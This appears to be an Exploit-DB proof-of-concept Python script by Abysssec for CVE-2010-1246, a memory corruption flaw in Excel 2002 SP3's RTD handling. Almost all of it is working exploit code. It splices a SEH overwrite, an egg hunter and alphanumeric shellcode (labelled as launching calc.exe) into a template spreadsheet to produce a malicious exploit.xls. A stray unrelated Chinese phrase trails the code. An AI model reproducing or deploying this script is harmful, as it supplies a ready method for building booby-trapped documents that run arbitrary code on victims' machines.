''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip) ''' ''' Title :Excel RTD Memory Corruption Version :Excel 2002 sp3 Analysis:http://www.abysssec.com Vendor:http://www.microsoft.com Impact:Critical Contact :shahin [at] abysssec.com , info[at] abysssec.com Twitter :@abysssec CVE :CVE-2010-1246 MOAUB Number:MOAUB_10_BA ''' import sys def main(): try: fdR = open('src.xls', 'rb+') strTotal = fdR.read() str1 = strTotal[:4509] str2 = strTotal[5013:15000] str3 = strTotal[15800:] eip = "\xAd\x57\x00\x30"# pop pop ret jmp = "\xF7\xC2\x03\x30"# call esp #Egg Hunter eggHunter = "" eggHunter += "\x90\x90\x90" eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63" eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7" # shellcode calc.exe shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41' if len(eggHunter) > 266: print "[*] Error : Shellcode length is long" return if len(eggHunter) <=266: dif =266 - len(eggHunter) while dif > 0 : eggHunter += '\x90' dif = dif - 1 if len(shellcode) > 800: print "[*] Error : Shellcode length is long" return if len(shellcode) <= 800: dif = 800 - len(shellcode) while dif > 0 : shellcode += '\x90' dif = dif - 1 fdW= open('exploit.xls', 'wb+') fdW.write(str1) fdW.write("\x41\x41\x41")# padding fdW.write(jmp) fdW.write(eggHunter) fdW.write("\xeb\x06\x41\x41") fdW.write(eip) fdW.write("\x81\xc4\x24\x16\x00\x00")# add esp,2016 fdW.write("\xc3")#ret i = 0 while i < 54 : fdW.write("\x41\x41\x41\x41")# padding i = i + 1 fdW.write(str2) fdW.write(shellcode) fdW.write(str3) fdW.close() fdR.close() print '[-] Excel file generated' except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main()
体验盒子
